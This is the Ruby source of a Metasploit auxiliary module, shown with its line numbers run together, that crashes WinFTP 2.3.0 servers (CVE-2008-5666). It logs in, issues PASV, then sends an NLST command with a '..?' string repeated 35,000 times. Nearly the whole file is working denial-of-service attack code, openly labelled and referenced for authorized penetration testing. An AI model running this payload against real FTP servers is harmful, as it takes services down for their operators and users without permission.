Path: blob/master/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
21553 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Ftp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'WinFTP 2.3.0 NLST Denial of Service',14'Description' => %q{15This module is a very rough port of Julien Bedard's16PoC. You need a valid login, but even anonymous can17do it if it has permission to call NLST.18},19'Author' => 'kris katterjohn',20'License' => MSF_LICENSE,21'References' => [22[ 'CVE', '2008-5666' ],23[ 'OSVDB', '49043' ],24[ 'EDB', '6581' ]25],26'DisclosureDate' => '2008-09-26',27'Notes' => {28'Stability' => [CRASH_SERVICE_DOWN],29'SideEffects' => [],30'Reliability' => []31}32)33)34end3536def run37return unless connect_login3839# NLST has to follow a PORT or PASV40send_cmd(['PASV'])4142raw_send("NLST #{'..?' * 35000}\r\n")4344disconnect45end46end474849